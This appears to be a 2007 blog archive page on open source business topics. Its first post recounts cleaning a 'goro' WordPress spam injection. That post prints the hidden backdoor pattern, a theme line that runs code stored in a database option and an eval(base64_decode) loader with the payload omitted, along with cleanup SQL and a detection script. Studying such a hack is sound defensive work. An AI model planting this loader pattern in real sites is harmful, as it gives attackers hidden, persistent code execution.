
  • Roberto Galoppini 10:06 pm on December 12, 2007 Permalink | Reply  

    WordPress Spam Injection: ‘Goro’ hacked my blog 

    Two days ago my Northern European friend Era, after reading a post, advised me that my blog had been silently owned by search engine spammers. Spam in blogs is definitely not a new phenomenon, but I knew very little about spam injection before, and I hope my experience can help other WordPress users.

    The problem was that a foreign div (“div id=goro“) was being loaded in the header, containing a list of spam links to various porn sites. I asked my dear webbie to help me, and she put me in touch with Francesco Mosca, who actually fixed the problem as follows.

    Within the theme’s header.php, hacked most likely through a WordPress 2.0.1 bug (the `$wp_headers = ` assignment on the first line is implied by the call on the last one):

    ```php
    <?php $wp_headers = create_function('', get_option("blog_headers")); ?>

    [snipped code]
    <?php $wp_headers() ?>
    ```

    Those lines actually execute the code stored in the database in the blog_headers option (“wp_options” table, option_name = ‘blog_headers’):


    ```php
    /* [long run of hex used as comment padding, omitted] */
    $c55375dba9d2f1867f4083acce95988dd = '[base64-encoded PHP payload, omitted]';
    $e_ = error_reporting(0);   // errors silenced, so a failing payload leaves no trace
    eval(base64_decode($c55375dba9d2f1867f4083acce95988dd));
    error_reporting($e_);
    return true;
    ```

    Decoding it with base64_decode showed that the code calls an external JavaScript file, which pastes spam links into the page on the fly, and that it also writes option rows whose names have the form rss_*, like the following:


    ```
    mysql> select option_value from wp_options where option_name = 'rss_fffbb7d85fc00f0c0d14abf4fde94ce3';
    +----------------------------------------------------------------------+
    | option_value                                                         |
    +----------------------------------------------------------------------+
    | YToyOntpOjA7czo0OiIxMTg3IjtpOjE7czoxODoiL3d3dy5tYW5kcml2YS5jb20vIjt9 |
    +----------------------------------------------------------------------+
    ```

    Besides erasing the above-mentioned lines from header.php, you also need to erase blog_headers and its ‘friends’ from the database:


    ```sql
    delete from wp_options where option_name = 'blog_headers';
    -- in LIKE the underscore is a single-character wildcard; rss\_% matches the literal prefix
    delete from wp_options where option_name like 'rss\_%'
      and option_name not in ('rss_language', 'rss_use_excerpt', 'rss_excerpt_length');
    ```
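    Both checks from the fix above (the create_function() call in header.php, and the injected blog_headers and rss_* options) are easier to repeat on other blogs with a script. The following Python is an added example, not Francesco Mosca’s fix and not WordPress code: the header.php text and the wp_options rows are constructed samples, apart from the rss_* option name and value quoted above, and the regex patterns and function names are my own.

    ```python
    """Detection and cleanup helper for the 'goro' blog_headers injection
    (hypothetical, added here; not the original fix and not WordPress code).
    The header.php text and wp_options rows below are constructed samples,
    except for the rss_* option name and value, which are the ones in the post."""
    import base64
    import binascii
    import re

    # Options WordPress itself keeps under the rss_ prefix, as listed in the
    # post's cleanup query; any other rss_* option is suspect.
    LEGIT_RSS_OPTIONS = {"rss_language", "rss_use_excerpt", "rss_excerpt_length"}

    # Theme-file indicator from the post: create_function('', get_option("..."))
    CREATE_FUNCTION_RE = re.compile(
        r"create_function\(\s*(['\"])\1\s*,\s*get_option\(\s*(['\"])([^'\"]+)\2\s*\)\s*\)")
    # Option-value indicator from the post: eval(base64_decode($var))
    EVAL_B64_RE = re.compile(r"eval\s*\(\s*base64_decode\s*\(")
    # key/value pairs of a flat PHP serialize()d array, e.g. i:0;s:4:"1187"; or i:0;i:5;
    PHP_PAIR_RE = re.compile(r'i:(\d+);(?:i:(-?\d+);|s:\d+:"([^"]*)";)')

    def scan_theme_file(source):
        """Return the option names a theme file turns into executable code."""
        return [m.group(3) for m in CREATE_FUNCTION_RE.finditer(source)]

    def decode_rss_option(value):
        """Decode an rss_* value: base64 of PHP serialize(array(seed, request_uri)).
        Only the flat int/string array form seen in the post is handled."""
        raw = base64.b64decode(value, validate=True).decode("utf-8", "replace")
        if not raw.startswith("a:"):
            raise ValueError("not a serialized PHP array")
        return {int(k): (int(i) if i else s) for k, i, s in PHP_PAIR_RE.findall(raw)}

    def scan_options(rows):
        """rows: iterable of (option_name, option_value) as stored in wp_options.
        Returns [(option_name, reason)] for rows matching the post's indicators."""
        findings = []
        for name, value in rows:
            if EVAL_B64_RE.search(value):
                findings.append((name, "stored PHP loader: eval(base64_decode(...))"))
            elif name.startswith("rss_") and name not in LEGIT_RSS_OPTIONS:
                try:
                    fields = decode_rss_option(value)
                    reason = "spam page record: seed %s for request %s" % (fields[0], fields[1])
                except (ValueError, KeyError, binascii.Error):
                    reason = "unexpected rss_* option with undecodable value"
                findings.append((name, reason))
        return findings

    def cleanup_sql(findings):
        """Per-row deletes for each finding, instead of the post's rss_% LIKE
        (where the underscore is a single-character wildcard)."""
        stmts = []
        for name in sorted({n for n, _ in findings}):
            stmts.append("delete from wp_options where option_name = '%s';"
                         % name.replace("'", "''"))
        return stmts

    # --- constructed samples ---------------------------------------------------
    SAMPLE_HEADER = """<?php $wp_headers = create_function('', get_option("blog_headers")); ?>
    <html><head><title>constructed theme header</title></head>
    <?php $wp_headers() ?>
    """
    SAMPLE_OPTIONS = [
        ("blogname", "Commercial Open Source"),
        ("rss_language", "en"),
        ("rss_excerpt_length", "50"),
        # shortened stand-in for the injected value; the real one carries a long base64 payload
        ("blog_headers", "$c55375dba9d2f1867f4083acce95988dd='UEhQ';$e_ = error_reporting(0); "
                         "eval(base64_decode($c55375dba9d2f1867f4083acce95988dd)); "
                         "error_reporting($e_); return true;"),
        # option name and value as quoted in the post's mysql output
        ("rss_fffbb7d85fc00f0c0d14abf4fde94ce3",
         "YToyOntpOjA7czo0OiIxMTg3IjtpOjE7czoxODoiL3d3dy5tYW5kcml2YS5jb20vIjt9"),
    ]

    if __name__ == "__main__":
        print("theme options executed as code:", scan_theme_file(SAMPLE_HEADER))
        hits = scan_options(SAMPLE_OPTIONS)
        for name, reason in hits:
            print("%-40s %s" % (name, reason))
        print("\n".join(cleanup_sql(hits)))
    ```

    On a live site you would feed scan_options() the result of `select option_name, option_value from wp_options` and scan_theme_file() every PHP file under the theme directory, not just header.php (one commenter found the same call in the footer).
    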

    Find the offending goro spamware injection before Google bans you from its index. Amazingly, as soon as I got it fixed my blog regained its previous position.

    Note: my blog is under repair these days; the old theme will soon be available, along with Twitter and Skype alerts. Sorry about that.

    Technorati Tags: wordpress, goro, spam injection, blog spam, FrancescoMosca

     
    • vseo 12:14 pm on January 8, 2008 Permalink

      Same on footer, same solution

    • Gordon Dewis 11:01 pm on March 13, 2008 Permalink

      You’re not alone in this. I found myself a victim of it after upgrading my WordPress to 2.3.x in December. Fortunately, I found someone else who had encountered it and their blog had some suggestions on how to deal with it. I blogged about the experience on my blog at http://gordon.dewis.ca/2008/01/06/expunging-the-wordpressnetin-spam-injection-hijack/

      It’s amazing how many people are still affected by it.

    • Apollo Lee 5:56 pm on April 30, 2008 Permalink

      Thanks for posting this. While a similar exploit only got my main blog, your post here really helped me know what to look for in the database. Combined with the WordPress 2.5.1 post over at WordPress.org, I was able to get this problem handled.

      I guess that’ll teach me to keep my software up to date. I wonder how long it’ll take until I’m back on Technorati and Google Blogsearch.

      Thanks again for your post.

    • Roberto Galoppini 9:27 am on May 1, 2008 Permalink

      I am really glad it helped you; when I got into trouble I felt really hopeless. As a matter of fact Google has proven to be really fast in giving my rank back, and I wish you the best of luck with that.

    • Oliver 12:11 pm on June 6, 2008 Permalink

      Good article! Your site let me learn more. Thanks! Pls keep up to date.

    • Aaron Wall 8:47 am on June 14, 2008 Permalink

      Thanks for posting this. Mine was hacked with the same hack on the 13th (yes friday). Not great luck for friday the 13th but this post gave me peace.

    • joe 12:48 pm on July 3, 2008 Permalink

      Hi, why don’t you activate Akismet? I have that kind of spam in a few blogs.

    • Roberto Galoppini 4:03 pm on July 3, 2008 Permalink

      I do Joe, I do.

    • Maria 12:14 pm on August 1, 2008 Permalink

      Very useful information for me. Thank you.

    • Hacker Forums 9:01 pm on October 7, 2008 Permalink

      Most all blog hacks are from people not upgrading their blog software.

      If you don’t make a ton of changes, just back up your template one time, then create or download a script to email you a database dump every couple of days.


    • RaiulBaztepo 11:25 pm on March 28, 2009 Permalink

      Hello!
      Very Interesting post! Thank you for such interesting resource!
      PS: Sorry for my bad English, I’ve just started to learn this language 😉
      See you!
      Your, Raiul Baztepo

    • Graham 3:39 am on November 12, 2010 Permalink

      I’ve been seeing a lot of chat lately on WordPress security problems. They are currently leading in the blog race, but will, for sure, start losing people unless they show some dramatic improvement very soon.

      Sorry about your problems but glad you found a fast fix and were restored to your previous Google rank.

      Graham

  • Roberto Galoppini 9:31 pm on December 10, 2007 Permalink | Reply  

    Open Source ECM: Alfresco opens up to social networks 

    After the announcement of the integration with Facebook Alfresco made public that Alfresco Social Computing Platform – which integrates Alfresco with Adobe Flex, Facebook, iGoogle, MediaWiki, TypePad and WordPress – will be available for download by tomorrow on SourceForge.

    While Alfresco is probably not the first open source project to experiment with Facebook, John Newton – co-founder and Chief Technical Officer of Alfresco – believes that pushing for the expansion of social computing in the enterprise is an imperative. John, in his “manifesto for Social Computing in the Enterprise”, states:

    The next generation of enterprise employees who started using the internet in their early teens have only known this evolving culture of free and creative development of the internet and now demand better of the enterprise software that they meet.

    While I don’t know if every CTO should be on Facebook, as Jon Williams says at the New York CTO blog, I believe Seth Gottlieb‘s theory is correct:

    most Intranets fail as social collaboration tools because they cannot capture the energy and passion that seems to form spontaneously on the web. And my theory goes on to assert that people do not invest their personal energy on their corporate intranet because they don’t own it.

    John, why are you addressing the Facebook audience?

    In order for ECM to move from 10% that are specialists in a firm (compliance, doc control, regulatory, maintenance and web sites) to the 90% that need it to control out-of-control information on shared drives, it would need to introduce compelling user interfaces based upon social networking and social computing.

    I think Alfresco made a great move: addressing the needs of the new generation of knowledge workers enables a new enterprise vision of social computing.

    Last but not least, rather than building everything on its own, Alfresco is defining an architecture of participation based on the Web Scripts Framework. Let’s see if it will eventually help them foster their community.

    Technorati Tags: Alfresco, JohnNewton, SethGottlieb, JonWilliams, Social Software, Facebook, oss, commercial open source, open business

     
  • Roberto Galoppini 8:03 pm on December 9, 2007 Permalink | Reply  

    Barcamp: Piublog 2007 

    The fourth Roman barcamp – Piublog 2007 – took place today within the event “Più libri più liberi” (eng.: more books, more freedom), the annual fair of the independent Italian publishing houses, held since 2002. A good chance to meet old friends again or, why not, make new ones on a gloomy, rainy day in Rome.

    Leo Sorge was a very nice host, embarrassed because the venue wasn’t really appropriate for a barcamp, being a single room lacking Wi-Fi. Fabio Masetti opened the barcamp; later Riccardo Cambiassi – who originally “imported” the barcamp into Italy – impressed me with a cool slideshow on barcamping.
    In the afternoon I enjoyed Nicola Mattina on corporate blogging, and Piergiorgio Lucidi’s introduction to microformats and the Semantic Web.

    I also spent time talking with people, among others Antonio Pavolini, Andrea Martines, Feba, Giulio Gaudiano and Stefano Epifani. I met Dario Salvelli for the very first time, and I suggested that Nicola Risitano (LSLUG, OpenCamp) have a look at the Open Source Guide for SMEs. Andrea Genovese was supposed to talk about his coworking project, but eventually Fabio Masetti spoke on his behalf.

    Technorati Tags: barcamp, piublog

     
    • Riccardo 11:37 am on December 10, 2007 Permalink

      Hi Roberto!
      It was a pleasure to meet you. Thanks for the compliments, undeserved.
      We didn’t have time to go through the slides properly, but you can find them on SlideShare if you’re interested.
      Hope to hear from you soon, let me know when you come through London!

      R

    • Dario Salvelli 2:42 pm on December 10, 2007 Permalink

      Roberto, it was really nice to meet you: I hope to talk more next time..

      Ehi, take care!!!

    • antoniocontent 12:45 pm on December 14, 2007 Permalink

      Nice to meet you, and sorry we couldn’t spend more time on our chat.

      I wish you a quick recovery!

      Cheers,

      🙂

      a

    • Piergiorgio Lucidi 7:41 pm on February 4, 2009 Permalink

      Thank you for your feedback about my talk during this event!

      Thank you again for your feedback sent to Sourcesense: now I’m working in a real Open Source company 😀

      Bye
      Piergiorgio

  • Roberto Galoppini 10:34 am on December 8, 2007 Permalink | Reply  

    Free Software Foundation Europe: The strange case of Certified Open 

    Stefano Maffulli‘s post “managing a non-profit organization is real business” made me wonder about the importance of transparency within free software organizations here in Europe.

    [Photo: “Shouldn’t I pose such questions?” by brighterworlds]

    Recently I happened to ask Georg Greve, Free Software Foundation Europe President, twice why FSFE is partnering with Open Forum, supporting “Certified Open” (tm).

    The Open Forum Europe is definitely not a success story. The EC-funded project, started in September 2005, ended at the beginning of this year, and we didn’t see any of the following promises realized:

    The aim of The OpenForum Europe (TOF-e) project is to put certainty and commercial clarity into the whole Open Source process. It will assist SMEs, Enterprises and the Public Sector in the pragmatic adoption and support of OSS by intermediating between business users and the OSS developers, integrators and support community across Europe.
    TOF-e represents the specific market validation phase of this eTEN project to rollout TOF-e across Europe and consists of 3 local portals in Denmark, Ireland and the UK.

    That said, why is FSFE supporting one of TOF-e’s creatures?

    Googling around I noticed that Shane McCoughan, FTF coordinator at FSFE, had some remarks about Certified Open, talking of misapplications of language and concepts. A couple of weeks later Shane joined Certified Open Ltd, and he is actually one of FSFE’s representatives on the Certified Open board.

    The question is still open.

    Technorati Tags: oss, open business, FSFE, Certified Open, ShaneMcCoughan, GeorgGreve, StefanoMaffulli

     
  • Roberto Galoppini 11:14 am on December 7, 2007 Permalink | Reply  

    Open Source Brand: No Logo Open Source? 

    My post about SugarCRM’s original way to abide by the GPL was picked up yesterday by Matt Asay, raising the open source brand issue. Building a brand takes time and money, and just like in any other market it drives demand. What is specific to open source branding?

    [Photo: “Logo meltdown” by Asta]

    On the 20th of August 1997 the Linux trademark dispute was resolved, and since then everyone in the open source community knows about the importance of brand names. Later on Red Hat started to protect its trademark, bringing the dispute onto commercial ground.

    The non-excludable nature of open source code makes it difficult to prevent competitors from “stealing” customers, and the argument on the table is, in Matt’s words:

    You can give away your software. You should never give away your brand.

    Trademark laws all over the world enable consumers of products to know the (real) source of the products they use, allowing them to distinguish those products from the products of other vendors. Consumers this way can’t be fooled into purchasing a product or a service of one company while believing it is a product of another company.

    Few open source firms have the ability to deliver worldwide open source services and support, and the demand for entrepreneurial open source ecosystems is much greater than the supply. Newcomers and open source incumbents could better exploit the opportunity to collaboratively create ecosystems. Open source product firms could re-invent different channel programs, providing qualified resellers with the real ability to deploy even complex solutions. On the other hand newcomers should stop thinking that re-branding third-parties’ open source products is enough.

    There are still just two ways to make money from OSS, called the “best code here” and “best knowledge here” approaches, but neither of them scales very well, unless you know how:

    • to become the market leader;
    • to manage collaborative software development.

    But appropriating returns is critical, and Open Source Franchising is still a good option.

    PS: Matt, “badgeware” is probably the most used expression referring to the visibility constraint, which I am not saying is bad at all. Protecting Open Source IP is important, I agree.

    Technorati Tags: oss, open business, open source brand, open source marketing, sugarCRM, MattAsay

     
    • Geoff SoftwareClub Dodd 10:10 am on December 15, 2007 Permalink

      As i see it, open source has a real branding problem. Something like OpenOffice just hasn’t had the brand build up of a suite like Ms Office. So people automatically lower their expectations and their interest. Same with Gimp and a branded graphics application. Same perceptions and lowered image and expectations.

    • Roberto Galoppini 9:08 pm on December 16, 2007 Permalink

      I wouldn’t say that Open Source has, at large, a branding problem. Few open source programs and platforms are quite in the know today. For example, talking about OpenOffice.org, I can tell you that only in September in Italy it got mentioned in more than 200 articles. Not bad, I would say.

      On the other side it is true that most OS programs are unknown, and that is why I believe there is a need for open source awareness campaigns.

  • Roberto Galoppini 2:28 pm on December 6, 2007 Permalink | Reply  

    Open Source Marketplace: SourceForge Marketplace goes live! 

    Last March SourceForge announced a new feature to buy or sell services for Commercial Open Source on SourceForge, eventually launched in beta in early summer. Now SourceForge has released its SourceForge Marketplace, with 512 Service Providers and 251 Projects available.
    Openbravo ERP is probably the most famous among the supported projects; nonetheless we should probably pay more attention to the (very) long tail. If we look at the estimate of the real number of active FLOSS projects done within FLOSSMETRICS, there are 18000 stable and mature projects out there.
    The SourceForge Marketplace could help to monetize open source projects, but it can also foster communities and, even more interesting, super-communities.

    Could products like SuiteTwo come to life within the SourceForge community?

    European countries like Germany, Italy, Spain, France and the UK account for about 30% of SourceForge’s 25 million unique visitors. There is clearly space here to contribute positively to European open source adoption.

    Full Disclosure: I am on SourceForge.net Marketplace advisory board.

    Technorati Tags: oss, open business, open source marketplace, sourceforge

     
  • Roberto Galoppini 2:48 pm on December 5, 2007 Permalink | Reply  

    Open Source Social Software: Gartner on Open Source Products 

    On the 24th of October Gartner released the Team Collaboration and Social Software Magic Quadrant by Nikos Drakos. The document reports on a revitalized collaboration support market, which also includes some open source products.

    [Photo: “Nice start” by Maszcha & J]

    While Gartner yawned at Open Source BI, this Magic Quadrant includes products from less-established vendors, and eventually open source products got their chance. More importantly, Drakos paid attention to the presence of independent activities adding value to the core product, where open source add-ons can play a decisive role.

    Deki Wiki (MindTouch), originally based on MediaWiki, ICE core (SiteScape), Movable Type (Six Apart), SocialText (SocialText) and Twiki (Twiki.net) were all mentioned.

    Ross Mayfield is pretty happy that SocialText is considered the most visionary provider, and behind only Microsoft, BEA and IBM in execution:

    This tells me that if we want to be the leader we need to demonstrate better execution (mind you, I’m not taking out IBM next year, but it is good feedback). SuiteTwo, of which we are a core component, also scored well in vision but has a way to go in execution.

    Execution. Open Source firms need to work hard on that, and it is a general issue. The absence of “horizontal” players in Europe, such as SpikeSource of the above-mentioned SuiteTwo, is an open issue.

    Getting back to Gartner, I am looking forward to reading an “Open Source Magic Quadrant”, a Magic Quadrant reporting more open source specific information about those products. As seen with Social Software there are a lot of open source products that are enterprise ready, so a qualification method allowing to differentiate among the numerous open source candidates is needed.

    A good starting point would be the QSOS metrics. Should I elaborate it further?

    Technorati Tags: oss, open business, social software, team collaboration, SocialText, RossMayfield, Twiki, Deki Wiki, Movable Type, ICE Core, Six Apart, SiteScape, MindTouch, Spikesource, SuiteTwo, MediaWiki, NikosDrakos

     
  • Roberto Galoppini 3:56 pm on December 4, 2007 Permalink | Reply  

    Open Source TCO: look at the COSPA recommendations (part 2)! 

    The EC-funded COSPA project defined two frameworks to better understand open source software adoption and the cost of migrations in public administrations. The COSPA findings reported below, grounded as they are in practical cases, form a basis for management and policy-makers interested in this area.

    [Photo: “Today’s recommendations” by shinyai]

    The “Report evaluating the costs/benefits of a transition towards ODS/OS for each key task related to personal productivity used in the PAs under study” – available thanks to the Wayback Machine – benchmarks the effectiveness of the deployed OSS solutions through a statistical and cost/benefit analysis using those frameworks.

    The study was conducted by applying the framework based on assimilation theory and identifying the most relevant factors. Such assimilation factors were then differentiated into facilitators of and inhibitors to OSS adoption. The last section of the document eventually presents a study on the migration costs and the cost of ownership.

    COSPA’s work compares in detail 6 PAs (Beaumont Hospital – Ireland, SGV – Italy, Extremadura – Spain, Skopje – Macedonia, Pisa – Italy and Törökbálint – Hungary) in terms of assimilation models and migration costs.
    On the basis of its findings, COSPA has formulated the following recommendations.

    Recommendation 1. (achieving a general level of OSS deployment) To achieve a general deployment of OSS, COSPA recommends that PAs focus on the specific facilitators and inhibitors to OSS assimilation we have identified, prior to migration. Specifically, COSPA suggests recognising that technological benefits of OSS outweigh its disadvantages – e.g. ability to tailor to precise needs, transparency – as these are important facilitators in the assimilation of OSS. In contrast, it is important to overcome the perception that employees might feel their work is under-valued if using ‘cheap’ OSS products, and also the perception that changing operating models to OSS might be problematic – e.g. no contracted maintenance support.

    Recommendation 2. (savings on costs) To base the decision to migrate to OSS to save on licenses costs alone is unrealistic as they are only initial costs, all too easily influenced by inflation and market fluctuations over time. COSPA recommends the decision to be based on two related evaluations: costs of migration and costs of ownership. The former involves high investment for a shorter period, while the latter foresees expenditure for maintenance over a period of at least five years. In the migration, COSPA findings report that a substantial factor are the intangible costs such as costs for peer training. COSPA also reports that there are no extra costs due to lack of productivity arising from the use of the OSS solution. Although training costs are a substantial part of the migration costs their benefits can be realised over the long term in terms of costs of ownership. People are more conscious of the software they work with when they have been trained on open source code. This gives more power to them in negotiating fees for consultancy and maintenance.

    Recommendation 3. (barriers in migration to OSS). As with any new radical IT innovation, a transition to OSS involves the discussion on barriers to migration. COSPA analysis has reported that barriers may arise in several areas: a lack of knowledge/experience in relation to what OSS products are appropriate and how they might be deployed. COSPA recommends a policy of both ad hoc and periodic training to help achieve the benefit of a transition to OSS. In the COSPA findings, some of the technical reasons that determined the success of a migration were exchange of documents in an open shared format (ODS), utilization of old hardware in high schools, being independent of software vendors even when creating a distribution or an application for local needs. COSPA recommends considering this factor before deciding to migrate, as the migration costs might not be really affordable and other reasons may need to be taken into consideration.

    Technorati Tags: oss, open business, COSPA, migration, recommendations

     
  • Roberto Galoppini 4:27 pm on December 3, 2007 Permalink | Reply  

    Open Source TCO: look at the COSPA frameworks (part 1)! 

    The EC-funded COSPA project, recently mentioned, defined frameworks to identify possible returns or losses from a transition to Open Data Standards or Open Source software.

    [Photo: “Two frameworks” by clbaran]

    Workpackage 3 derived two frameworks. The first one, from assimilation theory, is aimed at investigating adoption, in relation to the often-found gap between the initial acquisition and the eventual adoption of a technology.

    Acquiring Open Source software is easy, so the distinction between the adoption events of acquisition and actual deployment is of great importance. Considering that most of the time there is no blueprint indicating the required steps to guarantee a successful deployment of OSS, the gap between acquisition and actual deployment is often significant.

    The following set of constructs forms the framework used to investigate the assimilation of Open Source software:

    • Organization age & size – Older organizations are expected to be risk averse and less likely to undertake radical IT implementation initiatives such as OSS. Also, larger organizations may be better able to leverage the advantages of new technology, and have access to appropriately skilled personnel.
    • Industry type – Certain industry types may be more capable of leveraging the benefits of technology as it may suit their particular value chain configuration.
    • Strategic investment rationale – Strategic value propositions may justify resource commitments to adopt potentially beneficial technologies.
    • Increasing returns to adoption – Economies of scale and network externality effects may arise through the increasing contribution of additional adopters.
    • Knowledge barriers – extent of experience – Assimilation of new technology can be impeded by lack of relevant knowledge or experience.
    • Top management championship – New technology assimilation may require radical and high-risk initiatives that require proactive top management championship.
    • Extent of coordination – Coordination of knowledge across functional units of the organization can promote risk sharing & educate as to benefits of new technology.
    • Sophistication of IT infrastructure – Organizations with sophisticated IT infrastructure are more likely to have higher levels of knowledge about new IT possibilities, and thus embark on innovative IT assimilation.

    The second framework – related to the cost of transition – is aimed at revealing the causes of costs in relation to a specific context, especially to determine lock-in situations or to identify intangible costs. Intangible costs represent 75% of IT costs when the effects of innovation and productivity are monitored over more than five years, hence the importance of assessing such costs.

    TCO accounts for hidden costs and their propagation in the long run better than ROI, but Switching Costs are also important to better understand lock-in situations. Some switching costs are created by the vendor (endogenous) and are often measurable; others exist on their own (exogenous), like the cost of gathering information about alternative products or vendors. Implicit costs, such as customer uncertainty, are not measurable and often not even identifiable.

    The framework used to assess the cost of a transition to OSS takes into account the migration path (total migration from proprietary, partial from proprietary, partial from mixed, from scratch) and the type of administration (high/low economic resource growth, high/low size of the organization), with a strong emphasis on the difference between the volatile nature of migration costs and the cost of ownership.

    Both migration and ownership costs depend on context, types of migration and organization, as discussed above. The framework defines measures and questions about five main causes of costs:

    1. Learning/training.
       1. User acceptance: usefulness and ease of use;
       2. Unproductive user labour: lack of productivity due to excessive time spent in training;
       3. Internal training methods: casual learning/self-support;
       4. Formal training methods: expenses for course time.
    2. Software.
       1. Acquisition and licenses fees: software and add-ons, installation included;
       2. Maintenance: cost of routine tasks;
       3. Operational interoperability;
       4. Non standard PC configuration: configuration of new software;
       5. Security: licenses cost to prevent security violations.
    3. Contracts.
       1. Loyalty programs: benefits from incumbent;
       2. Contractual agreements: contractual commitments costs, including compensatory or liquidated damages.
    4. Staffing.
       1. IT-Staff payroll: including overtime and bonuses.
       2. IT-Staff attitude/culture.
    5. Support.
       1. External consultancies: fees for external support and services;
       2. Support search: including services for seeking qualifying apps and quality evaluation;
       3. Security: labour cost for preventing security violations.

    The next post will cover some case studies, focusing on how Open Source software is being used by public authorities across Europe.

    Technorati Tags: oss, open business, COSPA, migration

     
  • Roberto Galoppini 12:29 pm on December 2, 2007 Permalink | Reply  

    Open Source Licensing: SugarCRM’s original way to abide the GPL 

    After discussing why SugarCRM would have no reason to adopt the AGPL, yesterday I happened to download the Sugar Community Edition from the download page. Its About page made me wonder about a possible attribution loophole in the GPLv3.

    [Photo: "A new light" by MumbleyJoe]

    Some licensing background first. Here is an excerpt from the About page of the Sugar Community Edition 5.0:

    The interactive user interfaces in modified source and object code versions of this program must display Appropriate Legal Notices, as required under Section 5 of the GNU General Public License version 3.

    In accordance with Section 7(b) of the GNU General Public License version 3, these Appropriate Legal Notices must retain the display of the “Powered by SugarCRM” logo. If the display of the logo is not reasonably feasible for technical reasons, the Appropriate Legal Notices must display the words “Powered by SugarCRM”.

    Surprisingly, it looks almost like the previous version of the About page (courtesy of the Koders search engine):

    All copies of the Covered Code must include on each user interface screen:
    (i) the “Powered by SugarCRM” logo and
    (ii) the SugarCRM copyright notice
    in the same form as they appear in the distribution. See full license for requirements.

    I am not a lawyer, but if I got it right, Section 7 of the GNU GPL version 3 permits supplementing the license with certain additional terms. Section 7(b) states that, for material you add to a covered work, you may supplement the terms of the License with terms:

    b) Requiring preservation of specified reasonable legal notices or author attributions in that material or in the Appropriate Legal Notices displayed by works containing it;

    Section 7 thus became a viable tool to somehow reintroduce the attribution addendum contained in the SugarCRM Public License (Exhibit A).

    The question is: is requiring a logo a reasonable author attribution? I presume this is the case, at least in Eben Moglen's opinion. Moglen, in his "SugarCRM's Sweet Taste of Freedom", stated that SugarCRM is to be applauded, and I believe he already knew what I have just found out myself.

    Badgeware is not only OSI approved, but it is also endorsed by the Free Software Foundation now, with its flagship license. The debate is over.

    Back to my analysis of SugarCRM's licensing strategy: it is now clear that SugarCRM and SugarCRM's VCs still care a lot about brand protection. Their unique selling points are really strong, and as a matter of fact they found a way to accomplish both goals: branding and the adoption of a much more compatible license.

    Kudos to SugarCRM's lawyers for sorting it out.

    Technorati Tags: oss, open business, commercial open source, sugarCRM, GPL, FSF, OSI

     
    • Johan 3:25 pm on December 3, 2007 Permalink

      Interesting note but you miss a big point, GPL3 does not address the distribution of software over the internet. The terms in the license address distribution or re-distribution by the old methods. Google re-distributes MySql over the web and is not bound to submit their modifications back to MySql. We could all make significant additions to SugarCRM and host the advances with no need to submit them back to the community. We could even host SugarCRM and offer it for free. The cost of hosting has gone down significantly, do I smell an advertising model? I may host SugarCRM for free just for the heck of it. My company does some modifications and we’ll have a better CRM solution and no need to share this with SugarCRM.

      SugarCRM made a big mistake!!!! I am not sure why you are looking to rationalize bad decisions by a company that should have been smarter. This was a critical mistake and will affect their future!

    • Roberto Galoppini 6:35 pm on December 3, 2007 Permalink

      Johan,

      I have extensively talked about the GPL loophole before, that’s why I didn’t mention it here.

      SugarCRM has some unique selling points (see the above mentioned post), and it is definitely not trivial to spoil their business.

      About SugarCRM’s strategy, I must tell you that I am quite impressed by their community: they look pretty smart, honestly.

    • Johan 1:13 am on December 4, 2007 Permalink

      Hello Robert,

      Thank you for the reply but I still see tremendous exposure for SugarCRM. On a big picture level, I really don’t see how they can go public and file an S-1 listing the business risks and have anyone back their offering. The hosting of SugarCRM for free with focused updates that make “my version” a better solution would be a killer for them. Keep in mind they would be burdened with the heavy lifting of the core system whereas my “company” could focus on additional features. That is a big benefit for me and to Sugar’s detriment.

    • P.Woods 8:31 pm on December 9, 2007 Permalink

      What does “original way to abide the GPL” mean?
      I can’t think of the word you really meant instead of “abide.”

    • Roberto Galoppini 5:40 pm on December 10, 2007 Permalink

      It is pretty original because no one has publicly taken advantage of Section 7 of the GPLv3 for this purpose yet.

    • Michel 11:28 pm on January 5, 2008 Permalink

      I must agree with Johan’s comment, the GPL3 licensing approach or interpretation of it by SugarCRM is quite questionable indeed. It is a scary accommodation for anybody planning to use this project in the long term. And the question remains… what and when will be the next amendment made…

      It appears like a big contradiction where one extensive use of available source code and ideas has very little ‘reconnaissance’ in regards to its ‘sub’ stance. What about the amazing community of contributors which has helped SugarCRM expand upon its grand business scheme? Based on its licensing condition, I could just imagine what it would look like if all the ingenuous creators had little icons showing what they did or came up with on SugarCRM.

      As an organization SugarCRM has the merit for good integration of LAMP. One must also admit its marketing attraction strength which brings common richness to all with a lite subtle condition to its use. But one must wonder what this tiny little licensing condition might hold for the future?

    • Roberto Galoppini 12:22 pm on January 6, 2008 Permalink

      Michel, I think it is important to sort out whether it is the GPL3 licensing approach or SugarCRM’s interpretation of it. What I am saying, and I am not alone, is that the Free Software Foundation, Eben Moglen and open source attorneys like Mark Radcliffe all know that.

      I am not convinced that it is a scary accommodation, on the contrary I firmly believe it doesn’t make free software less free.
      Quoting you:

      What about the amazing community of contributors which has helped SugarCRM expand upon its grand business scheme? Based on its licensing condition, I could just imagine what it would look like if all the ingenuous creators had little icons showing what they did or came up with on SugarCRM.

      Attribution probably is not the best ever solution, but it sounds like the most appropriate one when we talk of the corporate production model.

      Democracy does not guarantee equality of conditions – it only guarantees equality of opportunity (Irving Kristol).
